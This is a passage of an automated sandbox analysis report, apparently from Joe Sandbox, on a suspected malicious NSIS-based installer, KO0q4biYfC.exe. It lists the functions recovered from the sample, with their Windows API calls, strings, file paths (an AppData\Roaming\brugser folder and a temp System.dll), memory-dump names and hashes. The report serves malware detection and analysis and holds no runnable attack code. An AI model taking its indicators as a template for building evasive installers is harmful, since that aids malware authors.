SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\,771B3420,"C:\Users\user\Desktop\KO0q4biYfC.exe",00000000), ref: 00403B59
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user~1\AppData\Local\Temp\), ref: 00403BD9
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\brugser\brugo,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\brugser\brugo), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C
1033, xrefs: 00403AF8, 00403B54
(7B, xrefs: 00403B04
_Nb, xrefs: 00403C5C, 00403CC4
Call, xrefs: 00403BA0, 00403BA9, 00403BB7, 00403C06, 00403C0C
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403AE4
RichEd20, xrefs: 00403D06
RichEdit20W, xrefs: 00403D24, 00403D2A
.DEFAULT\Control Panel\International, xrefs: 00403B44
"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 00403ADC
RichEdit, xrefs: 00403D33
.exe, xrefs: 00403BE6
RichEd32, xrefs: 00403D14
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 00403B68, 00403B70, 00403C13, 00403C19, 00403C29

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-70161172
Opcode ID: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: e3f75488d19024041f1bb343cbf8cb78a09e2a23954cfc0fd164e097734ab2b2
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 00402F30 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\KO0q4biYfC.exe,?), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\KO0q4biYfC.exe,C:\Users\user\Desktop\KO0q4biYfC.exe,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNELBASE(?,0040A230), ref: 004030F0

Strings

Null, xrefs: 00403029
soft, xrefs: 00403020
C:\Users\user\Desktop\KO0q4biYfC.exe, xrefs: 00402F4A, 00402F59, 00402F6D, 00402F8A
"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 00402F30
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Error launching installer, xrefs: 00402F80
Inst, xrefs: 00403017
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402F3D, 00403108
C:\Users\user\Desktop, xrefs: 00402F8B, 00402F90, 00402F96
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\KO0q4biYfC.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\KO0q4biYfC.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2436266766
Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(Call,?,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,?,00405487,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000), ref: 00406631

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll, xrefs: 0040642F
Call, xrefs: 00406434, 0040650F, 00406516, 0040651A, 00406534, 00406535, 0040654A, 0040655D, 00406579, 004065A4, 004065D8, 004065DE, 004065FA, 0040660D, 0040662A, 00406630, 0040663C, 0040666F

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-3886836084
Opcode ID: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: 8d374faab8b67e02b20779b8a2e58b36efa0b5910af5fdc4d12e9da804621c5a
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo,?,?,00000031), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\brugser\brugo,?,?,00000031), ref: 004017D5

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5

Part of subcall function 00405450: lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
Part of subcall function 00405450: lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
Part of subcall function 00405450: SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 0040179E

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp$C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll$C:\Users\user\AppData\Roaming\brugser\brugo$Call
API String ID: 1941528284-2804879308
Opcode ID: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
Opcode Fuzzy Hash: a38fa9d8c0b11b73c4a5c4591007dbfe993cf55f86f9aa7a4ca4efb874b1eb65
Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

Function 00405450 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00402F08,00402F08,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B

Strings

Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll, xrefs: 00405471, 00405481, 00405487, 004054AA, 004054B6

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsg3ACA.tmp\System.dll
API String ID: 2531174081-558231553
Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

Function 00406752 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
wsprintfW.USER32 ref: 004067A4
LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8

Strings

\, xrefs: 0040677A
%s%S.dll, xrefs: 0040679E
UXTHEME, xrefs: 0040675B

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

Function 0040591F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
GetLastError.KERNEL32 ref: 00405976
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
GetLastError.KERNEL32 ref: 00405995

Strings

C:\Users\user\Desktop, xrefs: 0040591F

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1346932479.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347049760.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347209553.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1347593091.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KO0q4biYfC.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3976562730
Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

Function 00405F0D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405F2B
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\KO0q4biYfC.exe",004034A3,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF), ref: 00405F46

Strings

"C:\Users\user\Desktop\KO0q4biYfC.exe", xrefs: 00405F0D
nsa, xrefs: 00405F1A
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405F12, 00405F16

Memory Dump Source

Source File: 00000000.00000002.1346983075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

